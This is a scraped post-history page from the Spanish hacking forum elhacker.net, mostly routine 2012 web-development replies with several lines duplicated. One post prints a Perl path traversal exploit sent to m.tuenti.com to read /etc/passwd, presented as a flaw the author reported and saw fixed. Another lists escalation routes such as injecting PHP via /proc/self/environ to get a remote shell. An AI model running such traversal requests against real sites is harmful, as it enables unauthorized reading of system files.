Es raro, me parece que el problema no es el fopen, que datos contienen el array $apli?
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#172
Nivel Web / Re: necesito recomendaciones de libros para estudiar sobre WEB
31 Mayo 2012, 16:14 PM
Cambien añadiria a esa lista, ajax y json... hoy dia se esta poniendo muy de moda.
También un libro sobre metologias de arquitectura y diseño.
También un libro sobre metologias de arquitectura y diseño.
#173
Nivel Web / Re: Reportar fallo de seguridad tuenti.
31 Mayo 2012, 16:05 PM
Pues encontré la vulnerabilidad probando, estaba analizando como estaba montada tuenti y bueno salio eso.
La gravedad de este tipo de vulnerabilidades es de las mas altas ya que si no es por un sitio puede ser por otro, se podría llegar a inyectar código php desde el user-agent y /proc/self/environ, también desde las sesiones e inyectar una shell remota, mirar archivos de configuración etc...
La verdad una vez encontré la vulnerabilidad simplemente la quise reportar, porque ya sabéis como son estas empresas u.u.
En fin... que no venden de que tienen nuestros datos protegidos, pero vamos cuento chino :S.
La gravedad de este tipo de vulnerabilidades es de las mas altas ya que si no es por un sitio puede ser por otro, se podría llegar a inyectar código php desde el user-agent y /proc/self/environ, también desde las sesiones e inyectar una shell remota, mirar archivos de configuración etc...
La verdad una vez encontré la vulnerabilidad simplemente la quise reportar, porque ya sabéis como son estas empresas u.u.
En fin... que no venden de que tienen nuestros datos protegidos, pero vamos cuento chino :S.
#174
PHP / Re: descifrar un archivo codificado (php) Scopbin? Alguien sabe sacarlo? Gracias!
31 Mayo 2012, 15:45 PM
jajaja si! es asqueroso, pero bueno eso me pasa al principio... luego ya dejo bien claro que el mantenimiento de código son los 3 primeros meses y solo por errores de programación, actualizaciones de php etc... el resto que lo paguen jajajaj
#175
Desarrollo Web / [Recomendado] Recomendando Host (2012)
31 Mayo 2012, 15:25 PM
Como se venia haciendo en estos hilos:
Hacemos otro para este año, y así tenemos información mas nueva.
Formato del post:
Empresa:
País:
Servicios:
Precios:
Ventajas:
Desventajas:
Otros datos relevantes:
URL Oficial (no afiliados o sera eliminada):
Ejemplo:
Por ultimo también podéis votar cual es el mejor hosting desde aquí.
Hacemos otro para este año, y así tenemos información mas nueva.
Formato del post:
Empresa:
País:
Servicios:
Precios:
Ventajas:
Desventajas:
Otros datos relevantes:
URL Oficial (no afiliados o sera eliminada):
Ejemplo:
CitarEmpresa: Hospedajes MundialesHOSPEDAJES MUNDIALES
País: España y latino ametica
Servicios: Hostings, Servidores, VPS y Dominios. HOSTING, SERVIDORES, VPS, DOMINIOS
Precios: Dominios desde 5€, Hosting desde 10€.
Ventajas: Muy buenos precios.
Desventajas: Gran soporte
Otros datos relevantes: Nada relevante.
URL Oficial: http://www.url.com/
Por ultimo también podéis votar cual es el mejor hosting desde aquí.
#176
Nivel Web / Re: Reportar fallo de seguridad tuenti.
31 Mayo 2012, 14:49 PM
Bueno le pase el error a diminitrix y el contacto con el encargado de seguridad, tambien se lo envié chica de elpais tecnología y ella contacto con tuenti, a las dos horas de hacerlo ya lo arreglaron.
El fallo era un path traversal que te permitía poder leer cualquier fichero del sistema(que tenga permisos claro).
Este era el exploit que utlizaba:
El fallo era un path traversal que te permitía poder leer cualquier fichero del sistema(que tenga permisos claro).
Este era el exploit que utlizaba:
Código [Seleccionar]
#!/usr/bin/perl
use IO::Socket::INET;
$host = "m.tuenti.com";
$attack = "../../../../../../../etc/passwd";
my $sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
print $sock $request . "GET /?m=" . $attack ."%00 HTTP/1.1\r\n"
. "Host: " . $host ."\r\n"
. "Connection: Close\r\n\r\n";
while($line = <$sock>) { print $line; }
#177
Desarrollo Web / Re: Joomla-ftp
31 Mayo 2012, 13:39 PM
No siempre hay que subir los ficheros a la raiz del FTP, depende de donde tenga el DocumentRoot tu servidor apache.
Generalmente suele ser en la carpeta www o htdocs.
Un saludo y revisa el httpd.conf y busca el parametro "DocumentRoot".
Un saludo.
Generalmente suele ser en la carpeta www o htdocs.
Un saludo y revisa el httpd.conf y busca el parametro "DocumentRoot".
Un saludo.
#178
Desarrollo Web / Re: [VIDEOTUTORIAL] Sistema de Comentarios, Adobe Dreamweaver, PHP, MySql...
31 Mayo 2012, 13:05 PM
Si vas a poner mas hilos con videotutoriales, lo mejores es que los pongas en el mismo hilo editando o bien como respuesta para asi no saturar el foro.
Un saludo!
Un saludo!
#179
PHP / Re: descifrar un archivo codificado (php) Scopbin? Alguien sabe sacarlo? Gracias!
31 Mayo 2012, 12:31 PM
Todo es descifrable Graphixx, es una lastima...
Sobre todo cuando vendes una aplicación, meten el dedito ellos toquetando código y encima te llaman para solucionar el problema..
Sobre todo cuando vendes una aplicación, meten el dedito ellos toquetando código y encima te llaman para solucionar el problema..
#180
PHP / Re: Alguien con experiencia usando EZPDF, por que no genera...
30 Mayo 2012, 23:54 PM
Puede que sea la versión de php q tengas en cada servidor.